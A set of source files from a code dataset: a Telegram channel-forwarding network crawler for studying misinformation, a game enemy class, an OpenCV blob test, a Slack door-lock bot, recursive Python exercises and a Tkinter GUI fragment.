misinformation_channel_usernames, misinformation_channel_ids\n\n# Initialize telegram client\ntelethon_api = SyncTelegramClient()\n# Configure logging\nlogging.basicConfig(filename='log.log', level=logging.DEBUG)\n\n\ndef initialize_data():\n \"\"\"Initialize the csv files. Data which was previously collected is lost.\"\"\"\n # Show 'Are you Sure?' message\n if input(\"Are you sure you want to initialize the data? All previously collected data will be lost. Please enter (y/n)\") != \"y\":\n exit()\n initialize_network()\n # Create messages directory if it does not exist\n if not os.path.exists('data/messages'):\n os.makedirs('data/messages')\n # Initialize csv files for storing Pandas dataframes\n df_chats = pd.DataFrame(columns=CHATS_COLUMNS)\n df_chats.to_csv('data/chats.csv', index=False)\n print('Initialized data')\n\ndef initialize_network():\n \"\"\"Initialize the network csv files. Data which was previously collected is lost.\"\"\"\n if input(\"Are you sure you want to initialize the network? All previously collected network data will be lost. Please enter (y/n)\") != \"y\":\n exit()\n # If the edges directory is not empty, i. e. contains old data, delete it\n if os.path.exists('data/network/edges') and not len(os.listdir('data/network/edges')) == 0:\n shutil.rmtree('data/network/edges')\n # If the graphs directory is not empty, i. e. 
contains old data, delete it\n if os.path.exists('data/network/graphs') and not len(os.listdir('data/network/graphs')) == 0:\n shutil.rmtree('data/network/graphs')\n # Create edges directory if it does not exist\n if not os.path.exists('data/network/edges'):\n os.makedirs('data/network/edges')\n # Create graphs directory if it does not exist\n if not os.path.exists('data/network/graphs'):\n os.makedirs('data/network/graphs')\n # Initialize csv files for storing Pandas dataframes\n df_scanned = pd.DataFrame(columns=SCANNED_COLUMNS)\n df_scanned.to_csv('data/network/scanned_log.csv', index=False)\n df_nodes = pd.DataFrame(columns=NODES_COLUMNS)\n df_nodes.to_csv('data/network/nodes.csv', index=False)\n print('Initialized network')\n\ndef add_chats_by_id(chats):\n \"\"\"\n Adds chats from the given list of ids to chats.csv.\n\n chats - A list of chat ids\n \"\"\"\n df_chats = pd.read_csv('data/chats.csv')\n stored_chat_ids = list(df_chats.iloc[:,0])\n chat_ids = [chat_id for chat_id in chats if chat_id not in stored_chat_ids]\n for chat_id in chat_ids:\n if type(chat_id) != int:\n raise TypeError('The list should contain ids as integers')\n chat_metadata = None\n try:\n chat_metadata = telethon_api.get_chat_metadata(chat_id)\n except ValueError:\n print('ValueError in chat ' + str(chat_id) + '. This probably means that the chat is not known by its id yet. You need to first retrieve it in some other way. If you know the username, use add_chat_by_username instead. See https://docs.telethon.dev/en/latest/concepts/entities.html#summary for more information.')\n df_chats.to_csv('data/chats.csv', index=False)\n return\n except ChannelPrivateError:\n print('The chat', chat_id, 'could not be added to chats.csv because it is private.')\n continue\n df_chats.loc[len(df_chats.index)] = [chat_id, chat_metadata['title'], chat_metadata['username'], chat_metadata['type'], chat_metadata['can_comment']]\n stored_chat_ids.append(chat_id)\n df_chats.to_csv('data/chats.csv', index=False)\n\ndef add_chats_by_username(chats):\n \"\"\"\n Adds chats from the given list of usernames to chats.csv.\n\n chats - A list of chat usernames\n \"\"\"\n if os.path.isfile('data/chats.csv'):\n df_chats = pd.read_csv('data/chats.csv')\n else:\n df_chats = pd.DataFrame(columns=CHATS_COLUMNS)\n already_stored_ids = list(df_chats.iloc[:,0])\n already_stored_usernames = [username.lower() for username in list(df_chats.dropna().iloc[:,2])]\n chat_usernames = [username for username in chats if username.lower() not in already_stored_usernames]\n for chat_username in tqdm(chat_usernames):\n if type(chat_username) != str:\n raise TypeError('The list should contain usernames as strings')\n try:\n # TODO: Check if chat is already stored before using api\n chat_metadata = telethon_api.get_chat_metadata(chat_username)\n except ValueError as error:\n print('The chat', chat_username, 'was not added because:', error)\n continue\n except ChannelPrivateError:\n print('The chat', chat_username, 'could not be added to chats.csv because it is private.')\n continue\n except Exception as error:\n print('The chat', chat_username, 'could not be added to chats.csv due to an error:')\n print(error)\n continue\n chat_id = chat_metadata['id']\n if chat_id not in already_stored_ids:\n df_chats.loc[len(df_chats.index)] = [chat_id, chat_metadata['title'], chat_metadata['username'], chat_metadata['type'], chat_metadata['can_comment']]\n df_chats.to_csv('data/chats.csv', index=False)\n\ndef usernames_to_ids(usernames):\n \"\"\"\n Transforms a list of usernames 
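(case-insensitively) into their stored chat ids.\n\n    A usage sketch -- the username strings and returned ids here are made up, purely illustrative:\n        usernames_to_ids(['SomeChannel', 'otherchannel'])  # -> e.g. [1001234567, 1007654321]\n\n    Put differently, it transforms a list of usernames 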
into a list of ids. The chats with the corresponding names must exist in chats.csv.\n\n usernames - The list of usernames that is transformed. Usernames are not case-sensitive.\n \"\"\"\n if not os.path.isfile('data/chats.csv'):\n print('chats.csv does not exist yet. You need to call initialize_data first.')\n return None\n # Read chat.csv, drop rows with missing values\n df_chats = pd.read_csv('data/chats.csv').dropna()\n # Transform username column to lower case, so that differences in upper/lower case between usernames list and stored usernames do not matter.\n df_chats['username'] = df_chats['username'].str.lower()\n df_chats = df_chats.set_index('username')\n ids = None\n # For each username in the list, try to find a corresponding entry in the stored chats, return the ids\n try:\n ids = [int(df_chats.loc[username.lower()]['id']) for username in usernames]\n except TypeError:\n print('There might be a duplicate in chats.csv.')\n print(traceback.format_exc())\n except KeyError as missing_username:\n print('The chat of username', missing_username, 'does not exist in chats.csv. You need to add it first using add_chats_by_username.')\n return ids\n\ndef set_network_seed(seed):\n \"\"\"\n Initializes the network by adding the seed chats from which to start crawling.\n\n seed - List of ids of the chats that are set as the initial nodes of the network\n \"\"\"\n df_chats = pd.read_csv('data/chats.csv').set_index('id')\n df_nodes = pd.read_csv('data/network/nodes.csv')\n if not df_nodes.empty:\n print('There is still old network data. You must call initialize_network() before setting a new network seed.')\n exit()\n for chat_id in seed:\n chat = None\n if chat_id in df_chats.index:\n chat = df_chats.loc[chat_id]\n else:\n print('The chat with id', chat_id, 'does not exist in chats.csv. You need to add it first.')\n exit()\n df_nodes.loc[len(df_nodes.index)] = [chat_id, chat['name'], 1, 0]\n df_nodes.to_csv('data/network/nodes.csv', index=False)\n print('Network seed set')\n\ndef set_network_seed_by_usernames(seed):\n \"\"\"\n Initializes the network by adding the seed chats from which to start crawling.\n\n seed - List of usernames of the chats that are set as the initial nodes of the network\n \"\"\"\n ids = usernames_to_ids(seed)\n if ids is not None:\n set_network_seed(ids)\n\ndef add_nodes(nodes_id_list):\n \"\"\"\n Adds the given nodes to the nodes.csv file. Only chats that are stored in chats.csv can be added as nodes.\n\n nodes_id_list - List of ids of the nodes to be added to the network\n \"\"\"\n df_chats = pd.read_csv('data/chats.csv').set_index('id')\n df_nodes = pd.read_csv('data/network/nodes.csv')\n for node_id in nodes_id_list:\n try:\n node_name = df_chats.loc[node_id]['name']\n df_nodes.loc[len(df_nodes.index)] = [node_id, node_name, 0, 0]\n except KeyError:\n print('Cannot add chat', node_id, 'as a node because it was not added to chats.csv.')\n df_nodes.to_csv('data/network/nodes.csv', index=False)\n\ndef add_edges(chat_id, edges):\n \"\"\"\n Adds the given edges to the edges csv file of the corresponding chat.\n\n chat_id - Id of the chat the forward edges were found in\n edges - The list of edges to be added\n \"\"\"\n df_nodes = pd.read_csv('data/network/nodes.csv').set_index('chat_id')\n edges_file_path = 'data/network/edges/'+str(chat_id)+'.csv'\n # If the chat already has an edge file, read it. 
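The file follows EDGES_COLUMNS and is keyed by message_id, e.g. (values made up for illustration):\n    #   message_id,forwarded_from\n    #   1203,987654321\n    # So: if the chat already has an edge file, read it. 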
Otherwise initialize an empty DataFrame.\n if os.path.isfile(edges_file_path):\n df_edges = pd.read_csv(edges_file_path)\n else:\n df_edges = pd.DataFrame(columns=EDGES_COLUMNS)\n df_edges = df_edges.set_index('message_id')\n for edge in edges:\n message_id, forwarded_from = edge\n df_edges.loc[message_id] = [forwarded_from]\n if not forwarded_from in df_nodes.index:\n df_nodes.loc[forwarded_from] = ['', 0, 0]\n df_nodes.at[forwarded_from, 'in_degree'] += 1\n df_edges.to_csv(edges_file_path)\n df_nodes.to_csv('data/network/nodes.csv')\n\ndef add_messages(chat_id, messages):\n \"\"\"\n Adds the given messages to the messages csv file of the corresponding chat.\n\n messages - List of messages to be added\n \"\"\"\n messages_file_path = 'data/messages/'+str(chat_id)+'.csv'\n # Create messages directory if it does not exist\n if not os.path.exists('data/messages'):\n os.makedirs('data/messages')\n # If the chat already has a message file, read it. Otherwise initialize an empty DataFrame.\n if os.path.isfile(messages_file_path):\n df_messages = pd.read_csv(messages_file_path)\n else:\n df_messages = pd.DataFrame(columns=MESSAGES_COLUMNS)\n df_messages = df_messages.set_index('id')\n for message in messages:\n message_id = message.id\n message_content = message.message\n message_forwarded = 1 if message.fwd_from else 0\n message_date = message.date\n message_views = message.views\n message_forwards = message.forwards\n df_messages.loc[message_id] = [message_content, message_forwarded, message_date, message_views, message_forwards]\n df_messages.to_csv(messages_file_path)\n\n\"\"\" This function does not work in Ipython \"\"\"\ndef scan_chat(nodes_in_network_id_list, chat_id, batch_size=100, offset_id=0, offset_date=None):\n \"\"\"Scans the given chat for forwarded messages from other chats in order to construct a network of chats. Stores all messages in messages.csv.\n\n Args:\n nodes_in_network_id_list: List of ids of all chats that are already part of the network.\n chat: Id of the chat that is going to be searched for forwards.\n Returns:\n new_nodes: Nodes in the network that were newly identified.\n forward_edges: a list of tuples (ch_destination ,ch_origin). 
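In the code below each appended edge is actually the pair (message_id, origin_channel_id),\n            e.g. forward_edges = [(1203, 987654321)] with made-up values, and add_edges() unpacks it that way.\n            In the original (ch_destination, ch_origin) phrasing: 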
This means that a message was forwarded from\n ch_origin to ch_destination.\n newest_message: the newest messages fetched from the chat in this run.\n oldest_message: the oldest message fetched from the chat in this run.\n \"\"\"\n new_nodes = []\n forward_edges = []\n total_messages = 0\n newest_message = None\n oldest_message = None\n while total_messages < batch_size:\n try:\n # Fetch the last 100 messages\n messages = telethon_api.fetch_messages(\n chat=chat_id,\n offset_id=offset_id,\n offset_date=offset_date\n )\n except ValueError:\n print('ValueError in chat', chat_id)\n break\n except Exception as e:\n print('Exception in chat', chat_id, ':', e)\n break\n if not messages:\n break\n\n add_messages(chat_id, messages)\n newest_message = messages[0]\n for m in messages:\n oldest_message = m\n # If a msg was forwarded from another chat, append it to the list\n if m.fwd_from and hasattr(m.fwd_from ,'from_id') and hasattr(m.fwd_from.from_id, 'channel_id') and m.fwd_from.from_id.channel_id != chat_id:\n forwarded_from_id = m.fwd_from.from_id.channel_id\n try:\n forward_edges.append((m.id, forwarded_from_id))\n if not telethon_api.is_private(forwarded_from_id): # Just calling is_private on a private chat causes ChannelPrivateError\n if forwarded_from_id not in new_nodes and forwarded_from_id not in nodes_in_network_id_list:\n new_nodes.append(forwarded_from_id)\n except ChannelPrivateError:\n logging.info(str(forwarded_from_id) + ' is private')\n total_messages += 1\n if total_messages >= batch_size:\n break\n offset_id = messages[len(messages) - 1].id\n\n return new_nodes, forward_edges, newest_message, oldest_message\n\ndef extend_network(iterations=1, scan_size=100, only_scan_chats=None, max_date=None, min_degree=0):\n \"\"\"\n Take nodes from the network corresponding to chats that have not been scanned yet, search for forwarded messages in these chats, use them to extend the network.\n \n The chat ids along with the ranges of messages scanned are stored in data/network/scanned_log.csv.\n The network edges are stored in data/network/edges/.csv, where the file is named after the chat the messages were forwarded to.\n Nodes are stored in data/network/nodes.csv and if they were discovered for the first time, the chat is stored in data/chats.csv\n\n iterations - The number of iterations in which the chats not scanned so far are taken from chats.csv and scanned to obtain new nodes/edges for the network\n scan_size - The number of messages that are scanned for forwards in each chat\n only_scan_chats - List of chat ids. If given, the network is only extended from these chats.\n min_degree - The minimum degree of a node from which the network is extended.\n \"\"\"\n if not os.path.isfile('data/chats.csv'):\n print('chats.csv does not exist yet. 
You need to call initialize_data first.')\n return\n \n if only_scan_chats != None and type(only_scan_chats[0]) != int:\n print('only_scan_chats must be a list of ids')\n return\n\n # create edges directory if it does not exist\n if not os.path.exists('data/network/edges'):\n os.makedirs('data/network/edges')\n\n offset_date = datetime.datetime(*max_date).replace(hour=23, minute=59, second=59, microsecond=999999) if max_date != None else None\n \n for i in range(iterations):\n print('Extending network: Iteration', i+1, 'of', iterations)\n # Determine which chats to scan\n df_nodes = pd.read_csv('data/network/nodes.csv')\n already_stored_nodes_id_list = list(df_nodes.iloc[:,0])\n df_scanned_log = pd.read_csv('data/network/scanned_log.csv')\n scanned_nodes_id_list = list(df_scanned_log.iloc[:,0])\n if only_scan_chats != None:\n chats_to_scan = [chat_id for chat_id in already_stored_nodes_id_list if chat_id in only_scan_chats and chat_id not in scanned_nodes_id_list]\n else:\n chats_to_scan = [chat_id for chat_id in already_stored_nodes_id_list if chat_id not in scanned_nodes_id_list]\n df_nodes = df_nodes.set_index('chat_id')\n\n for chat_id in tqdm(chats_to_scan):\n # Prevent scanning a chat that has already been scanned. Prevent scanning a chat that has a degree of less than min_degree.\n if chat_id not in scanned_nodes_id_list and df_nodes.at[chat_id, 'in_degree'] >= min_degree:\n new_nodes_found, forward_edges, newest_message, oldest_message = scan_chat(already_stored_nodes_id_list, chat_id, batch_size=scan_size, offset_date=offset_date)\n if newest_message != None and oldest_message != None:\n # log the range of messages scanned\n scanned_nodes_id_list.append(chat_id)\n df_scanned_log.loc[len(df_scanned_log.index)] = [chat_id, newest_message.id, newest_message.date, oldest_message.id, oldest_message.date]\n df_scanned_log.to_csv('data/network/scanned_log.csv', index=False)\n # store newly discovered chats as well as nodes and edges\n add_chats_by_id(new_nodes_found)\n add_nodes(new_nodes_found)\n already_stored_nodes_id_list.extend(new_nodes_found)\n add_edges(chat_id, forward_edges)\n else:\n print('Chat', chat_id, 'contains no messages')\n scanned_nodes_id_list.append(chat_id)\n now = datetime.datetime.utcnow().replace(tzinfo=datetime.timezone.utc).replace(microsecond=0).isoformat().replace('T', ' ')\n df_scanned_log.loc[len(df_scanned_log.index)] = [chat_id, 0, now, 0, now]\n df_scanned_log.to_csv('data/network/scanned_log.csv', index=False)\n\n\ndef extend_with_older_forwards(chat_id, scan_size=100):\n \"\"\"\n Scan the given number of messages in the chat prior to the currently oldest scanned message. Identify forwards and use them to extend the network.\n\n chat_id - Id of the chat to be scanned\n scan_size - The number of messages that are scanned for forwards in the chat\n \"\"\"\n df_scanned_log = pd.read_csv('data/network/scanned_log.csv')\n chat_row = df_scanned_log.loc[df_scanned_log['chat_id'] == chat_id]\n if chat_row.empty:\n print('The chat with id', chat_id, 'has not been scanned yet. 
Therefore it cannot be extended.')\n return\n oldest_message_id = int(chat_row['oldest_message_id'])\n df_nodes = pd.read_csv('data/network/nodes.csv')\n nodes_id_list = list(df_nodes.iloc[:,0])\n new_nodes_found, forward_edges, _, oldest_message = scan_chat(\n nodes_id_list, \n chat_id, \n batch_size=scan_size, \n offset_id=oldest_message_id\n )\n if oldest_message != None:\n # If there were no older messages, oldest_message is None\n # Log the new oldest message scanned\n df_scanned_log = pd.read_csv('data/network/scanned_log.csv').set_index('chat_id')\n df_scanned_log.at[chat_id, 'oldest_message_id'] = oldest_message.id\n df_scanned_log.to_csv('data/network/scanned_log.csv')\n # store newly discovered chats as well as nodes and edges\n add_chats_by_id(new_nodes_found)\n add_nodes(new_nodes_found)\n add_edges(chat_id, forward_edges)\n\ndef extend_all_with_older_forwards(scan_size=100):\n \"\"\"\n Scan the given number of messages in all chats in the network prior to the currently oldest scanned message in each chat. Identify forwards and use them\n to extend the network.\n\n scan_size - The number of messages that are scanned for forwards in each chat\n \"\"\"\n df_scanned_log = pd.read_csv('data/network/scanned_log.csv')\n scanned_nodes_id_list = list(df_scanned_log.iloc[:,0])\n for chat_id in tqdm(scanned_nodes_id_list):\n extend_with_older_forwards(chat_id, scan_size)\n\ndef extend_chats_with_older_forwards(chat_ids=[], scan_size=100):\n \"\"\"\n Scan the given number of messages in all chats in the list, prior to the currently oldest scanned message in each chat. Identify forwards and use them\n to extend the network.\n\n chat_ids - Ids of the chats to be scanned\n scan_size - The number of messages that are scanned for forwards in each chat\n \"\"\"\n if len(chat_ids) > 0 and type(chat_ids[0]) != int:\n print('chat_ids must be a list of ids')\n return\n\n df_scanned_log = pd.read_csv('data/network/scanned_log.csv')\n scanned_nodes_id_list = list(df_scanned_log.iloc[:,0])\n for chat_id in tqdm(chat_ids):\n if chat_id not in scanned_nodes_id_list:\n print('The chat with id', chat_id, 'has not been scanned yet. 
Therefore it cannot be extended.')\n else:\n extend_with_older_forwards(chat_id, scan_size)\n\n\nif __name__ == \"__main__\":\n pass\n # add_chats_by_username(misinformation_channel_usernames)\n # initialize_network()\n # set_network_seed_by_usernames(misinformation_channel_usernames)\n # extend_network(iterations=1, scan_size=100, max_date=(2022, 2, 28), min_degree=5)\n # extend_chats_with_older_forwards(misinformation_channel_ids, scan_size=200)","repo_name":"TBiele/telegram-network-crawler","sub_path":"network_crawler.py","file_name":"network_crawler.py","file_ext":"py","file_size_in_byte":21054,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37720039493","text":"import resources\nimport random\nfrom Actor import Actor\nfrom Meat import Meat\nfrom Bone import Bone\nfrom math import atan, cos, sin, pi\n\n\nclass Enemy(Actor): # This defines the Enemy Class\n\n def __init__(self, day=1, *args, **kwargs):\n super(Enemy, self).__init__(*args, **kwargs)\n self.vt = 100\n self.vMax = self.vt\n self.vu = self.vt\n self.vTheta = self.rot + 90\n self.damage = 1\n self.day = day\n if self.vTheta > 360:\n self.vTheta += -360\n\n self.health = 100\n self.dead = False\n\n self.aggroDistance = 1000\n self.attackDistance = 55\n\n self.deathImage = random.choice(resources.deadChickenImages)\n\n def attack(self, player):\n if random.randint(1, 100) < 20:\n player.health -= self.damage + self.day ** 1.1\n # print player.health\n\n def die(self):\n self.texture = self.deathImage\n self.interactable = True\n self.actions = [\"Get Meat\", \"Get Bones\"]\n self.vt = 0\n self.vx = 0\n self.vy = 0\n self.dead = True\n\n def perform_action(self, player, action):\n self.interactable = False\n self.viewable = False\n if action == \"Get Meat\":\n player.get_item(Meat(poisoned=(self.poison != 0)))\n self.interactable = False\n if action == \"Get Bones\":\n player.get_item(Bone())\n self.interactable = False\n\n def set_orientation(self, targetTheta):\n self.rot = targetTheta\n\n def stop(self):\n self.vx = 0\n self.vy = 0\n\n def moveForward(self):\n self.vx = self.vu * cos((self.rot + 90) * pi / 180)\n self.vy = self.vu * sin((self.rot + 90) * pi / 180)\n\n def check_player_distance(self, player):\n self.xDistance = player.x - self.x\n self.yDistance = player.y - self.y\n self.distance = ((self.xDistance) ** 2 + (self.yDistance) ** 2) ** (.5)\n if self.xDistance != 0:\n theta = atan(self.yDistance / self.xDistance)\n if theta < 0:\n theta += 2 * pi\n if self.xDistance < 0 and self.yDistance > 0:\n theta += -pi\n elif self.xDistance < 0 and self.yDistance < 0:\n theta += pi\n elif self.yDistance > 0:\n theta = pi / 2\n else:\n theta = 3 * pi / 2\n\n self.theta = theta * 180 / pi - 90\n\n if self.theta < 0:\n self.theta += 360\n\n def aggro(self, player):\n self.check_player_distance(player)\n if self.distance < self.aggroDistance:\n self.vTheta = self.theta + 90\n self.vu = 250 * self.vt / (self.distance ** 1.25 + 20)\n self.set_orientation(self.theta)\n if self.distance <= self.attackDistance:\n self.stop()\n self.attack(player)\n else:\n self.moveForward()\n else:\n self.stop()\n\n def update(self, dt, player):\n self.x += self.vx * dt\n self.y += self.vy * dt\n\n if self.poison != 0:\n self.health -= self.poison\n self.poisonTime -= dt\n self.rgba = (0, 1, 0, 1)\n if self.poisonTime < 0:\n self.poison = 0\n self.poisonTime = 0\n self.rgba = (1, 1, 1, 1)\n\n self.collideAngle = None\n # if self.attacking == True:\n # 
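a guard along these lines could re-enable it (a hedged sketch, not the shipped behaviour; the attribute names mirror this class):\n        # if self.attacking and self.distance <= self.attackDistance:\n        #     self.attack(player)\n        # original commented-out call: 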
self.attack()\n","repo_name":"segerphilip/sofdesfinal","sub_path":"Classes/Enemy.py","file_name":"Enemy.py","file_ext":"py","file_size_in_byte":3492,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"40366698148","text":"import cv2\nimport numpy as np\nimport matplotlib.pyplot as plt\n# Read image\nim = np.load('test.npz')['olog'].astype(np.uint8)\n\nim = cv2.blur(im, (3,3))\ntmp = cv2.applyColorMap(im, cv2.COLORMAP_HOT)\n\n\n# Blob detector\nparams = cv2.SimpleBlobDetector_Params()\nparams.minThreshold = 10\nparams.maxThreshold = 255\nparams.filterByArea = False\nparams.filterByCircularity = False\nparams.minCircularity = 0.1\nparams.filterByConvexity = False\nparams.minConvexity = 0.87\nparams.filterByInertia = False\nparams.minInertiaRatio = 0.01\ndetector = cv2.SimpleBlobDetector_create(params)\nkeypoints = detector.detect(im)\nim_with_keypoints = cv2.drawKeypoints(np.zeros(np.shape(im), dtype=np.uint8), keypoints, np.array([]), (0, 255, 0), cv2.DRAW_MATCHES_FLAGS_DRAW_RICH_KEYPOINTS)\ncv2.imshow(\"keypoints\", im_with_keypoints)\ncv2.waitKey(0)","repo_name":"orjan1992/pySonar","sub_path":"oldTests/image_tests/blob_test.py","file_name":"blob_test.py","file_ext":"py","file_size_in_byte":817,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"29854589782","text":"# -*- coding: utf-8 -*-\nfrom slackbot.bot import respond_to, listen_to\nimport re\n\n# 「カギ開けて」「解錠して」等に反応するようにします\n\n\n@listen_to(u'(鍵|カギ)+.*(開|あけ|空け)+')\n@listen_to(u'(解錠)+')\n@listen_to('(open)+.*(door)+', re.IGNORECASE)\n@respond_to(u'(鍵|カギ)+.*(開|あけ|空け)+')\n@respond_to(u'(解錠)+')\n@respond_to('(open)+.*(door)+', re.IGNORECASE)\ndef openKeyOrder(message, *something):\n    # if カギが閉まっていたら :\n    message.reply(u'わかりました。解錠します。')\n    # 命令を出したユーザ名を取得することもできます。\n    userID = message.channel._client.users[message.body['user']][u'name']\n    print(userID + 'さんの命令でカギを開けます')\n\n# 「鍵閉めて」「施錠」等の場合はこちら\n\n\n@listen_to(u'(鍵|カギ)+.*(閉|しめ|締め)+')\n@listen_to(u'(施錠)+')\n@listen_to('(lock)+.*(door)+', re.IGNORECASE)\n@respond_to(u'(鍵|カギ)+.*(閉|しめ|締め)+')\n@respond_to(u'(施錠)+')\n@respond_to('(lock)+.*(door)+', re.IGNORECASE)\ndef closeKeyOrder(message, *something):\n    # 以下openと同じなので省略\n    message.reply(u'わかりました。施錠します。')\n    # 未許可なFeLiCaを許可ユーザとして追加する命令\n\n\n@listen_to(u'(許可|追加)+')\n@respond_to(u'(許可|追加)+')\ndef addUserOrder(message, *something):\n    # 「」で囲まれている場合はユーザ名付きで許可する。\n    m = re.search(u'「.*」', message.body['text'])\n    if m:\n        hit = m.group(0)\n        userName = hit[1:][:-1]\n        message.reply(u'わかりました。直近のインスタントユーザを「' +\n                      userName + u'」として追加します。有効期限は10分間です。')\n    else:\n        userName = 'John Doe'\n        message.reply(u'わかりました。直近のインスタントユーザを追加します。有効期限は10分間です。')\n\n    # 該当のFeLiCaを許可ユーザに追加する処理… userAddHandler(userName, userID)\n","repo_name":"KanNa-max/SmartLock_QR","sub_path":"code/slackbot/SlackBotPlugin.py","file_name":"SlackBotPlugin.py","file_ext":"py","file_size_in_byte":2055,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5867442733","text":"# 1. Write a recursive python function to print first N natural numbers.\r\n\r\ndef natural_numbers(n):\r\n    if n > 0:\r\n        natural_numbers(n-1)\r\n        print(n, end=\" \")\r\n\r\n\r\nn = int(input(\"Enter a number:\"))\r\nnatural_numbers(n)\r\n\r\n\r\n# 2. 
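(a quick aside on problem 1 just above -- an illustrative trace, not part of the assignment:\r\n#    for n = 3 the calls recurse down to natural_numbers(0), and each level prints only after\r\n#    its recursive call returns, so the output is 1 2 3)\r\n# 2. 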
Write a recursive python function to print first N natural numbers in reverse order\r\ndef revrs_natural(n):\r\n\r\n if n > 0:\r\n print(n, end=\" \")\r\n revrs_natural(n - 1)\r\n\r\n\r\nn = int(input(\"Enter number:\"))\r\nrevrs_natural(n)\r\n\r\n# 3. Write a recursive python function to print first N odd natural numbers\r\ndef odd_natural(n):\r\n\r\n if n>0:\r\n odd_natural(n-1)\r\n if n % 2 != 0:\r\n print(n, end=\" \")\r\n\r\n\r\ns = int(input(\"Enter a NUmber:\"))\r\nodd_natural(s*2)\r\n\r\n\r\n# 4. Write a recursive python function to print first N odd natural numbers in reverse order\r\ndef rev_odd_natural(n):\r\n if n % 2 != 0:\r\n print(n, end=\" \")\r\n if n > 0:\r\n rev_odd_natural(n - 1)\r\n\r\n\r\ns = int(input(\"Enter a NUmber:\"))\r\nrev_odd_natural(s*2)\r\n\r\n# 5. Write a recursive python function to print first N even natural numbers.\r\ndef even_natural(n):\r\n\r\n if n>1:\r\n even_natural(n-1)\r\n if n % 2 == 0:\r\n print(n, end=\" \")\r\n\r\n\r\ns = int(input(\"Enter a NUmber:\"))\r\neven_natural(s*2)\r\n\r\n\r\n# 6. Write a recursive python function to print first N even natural numbers in reverse order.\r\ndef rev_even_natural(n):\r\n if n % 2 == 0:\r\n print(n, end=\" \")\r\n if n > 1:\r\n rev_even_natural(n - 1)\r\n\r\n\r\ns = int(input(\"Enter a Number:\"))\r\nrev_even_natural(s*2)\r\n\r\n# 7. Write a recursive python function to print squares of first N natural numbers\r\ndef natural_squares(n):\r\n if n > 1:\r\n natural_squares(n - 1)\r\n print(n**2,end=\" \")\r\n\r\n\r\ns = int(input(\"Enter a Number:\"))\r\nnatural_squares(s)\r\n\r\n# 8. Write a recursive python function to print cubes of first N natural numbers\r\ndef natural_cube(n):\r\n if n > 1:\r\n natural_cube(n - 1)\r\n print(n**3,end=\" \")\r\n\r\n\r\ns = int(input(\"Enter a Number:\"))\r\nnatural_cube(s)\r\n\r\n# 9. Write a recursive python function to print first N multiples of a given number.\r\ndef multiples(n):\r\n if n == 1:\r\n return 1\r\n s = n*multiples(n-1)\r\n return s\r\n\r\n\r\ns = int(input(\"Enter a Number:\"))\r\nprint(multiples(s))\r\n\r\n# 10. 
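(a caveat on problem 9 just above: the function multiplies n * multiples(n-1) down to 1, so\r\n#     multiples(n) returns n factorial -- e.g. multiples(4) == 24 -- rather than printing the\r\n#     first N multiples of a given number)\r\n# 10. 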
Write a recursive python function to print a number in reverse order.\r\ndef reverse(n, r):\r\n if n == 0:\r\n return r\r\n else:\r\n return reverse(n//10, r*10 + n % 10)\r\n\r\n\r\nnumber = int(input(\"Enter number: \"))\r\n\r\nreversed_number = reverse(number, 0)\r\n\r\nprint(\"Reverse of {} is {}\" .format(number, reversed_number))\r\n\r\n\r\n","repo_name":"Mohanish-ThatfatKid/PYTHON-Assignments","sub_path":"Assignment21.py","file_name":"Assignment21.py","file_ext":"py","file_size_in_byte":2613,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"33210859678","text":"#!/usr/bin/env python3\r\n# -*- coding: utf-8 -*-\r\n\r\n' GUI components '\r\n\r\n__author__ = 'Mappy Group'\r\n\r\nfrom tkinter import *\r\nfrom tkinter import filedialog\r\nfrom mapStruct import *\r\nfrom mapFile import *\r\nfrom dialog import *\r\nimport datetime\r\nimport sys\r\nsys.path.append('.\\\\icons')\r\nimport icons\r\n\r\nclass CBtn(Checkbutton):\r\n def __init__(self, master, layer):\r\n Checkbutton.__init__(self, master, text = layer.name, bg = 'LightYellow', command = self.setVisible)\r\n self.layer = layer\r\n if self.layer.onEdit:\r\n self['fg'] = 'blue'\r\n self.var = IntVar()\r\n self.var.set(1)\r\n self['variable'] = self.var\r\n self.select()\r\n self.pack(anchor = W)\r\n self.y = None\r\n self.bind('', self.sPos)\r\n self.bind('', self.ePos)\r\n\r\n def setVisible(self):\r\n if self.var.get():\r\n self.layer.setVisible(True)\r\n else:\r\n self.layer.setVisible(False)\r\n\r\n self.master.master.cv.invalidate()\r\n\r\n def sPos(self, event):\r\n self.y = event.y\r\n \r\n def ePos(self, event):\r\n d = int((event.y - self.y) / 25)\r\n if d:\r\n self.master.pMap.moveLayer(self.layer, d)\r\n\r\nclass IconButton(Button):\r\n def __init__(self, master, **kwargs):\r\n Button.__init__(self, master, **kwargs)\r\n\r\n def set_icon(self, iconname, **kwargs):\r\n tk_img = icons.get(iconname,\r\n width=kwargs.get(\"width\"),\r\n height=kwargs.get(\"height\"))\r\n self.config(image=tk_img, **kwargs)\r\n if not kwargs.get(\"anchor\"): kwargs[\"anchor\"] = \"center\"\r\n if kwargs.get(\"compound\"):\r\n def expand():\r\n self[\"width\"] += tk_img.width()\r\n self[\"height\"] += tk_img.height() / 2\r\n self.after(100, expand)\r\n self.tk_img = tk_img\r\n\r\n\r\n\r\nclass LFrm(Frame):\r\n def __init__(self, master):\r\n Frame.__init__(self, master, bg = 'LightYellow')\r\n Label(self, text=\"--------------图层--------------\", bg = 'LightYellow', width = '20').pack()\r\n self.pMap = ''\r\n self.chkLayers = []\r\n\r\n def setMap(self, pMap):\r\n self.pMap = pMap\r\n \r\n def flash(self):\r\n if self.pMap == '':\r\n return\r\n \r\n for cb in self.chkLayers:\r\n cb.destroy()\r\n self.chkLayers = []\r\n for layer in self.pMap.layers:\r\n chk = CBtn(self, layer)\r\n self.chkLayers.append(chk)\r\n\r\n\r\n\r\nclass TFrm(Frame):\r\n def __init__(self, master, menubar):\r\n Frame.__init__(self, master, bg = 'LightCyan')\r\n\r\n self.open_file = IconButton(self, text = 'open file', command = menubar.openFile)\r\n self.open_file.set_icon('open.png', width = 20, height = 20)\r\n self.open_file.pack(side = \"left\", padx = 2, pady = 2)\r\n\r\n self.save_file = IconButton(self, text = 'save file', state = 'disabled', command = menubar.saveFile)\r\n self.save_file.set_icon('save.png', width = 20, height = 20)\r\n 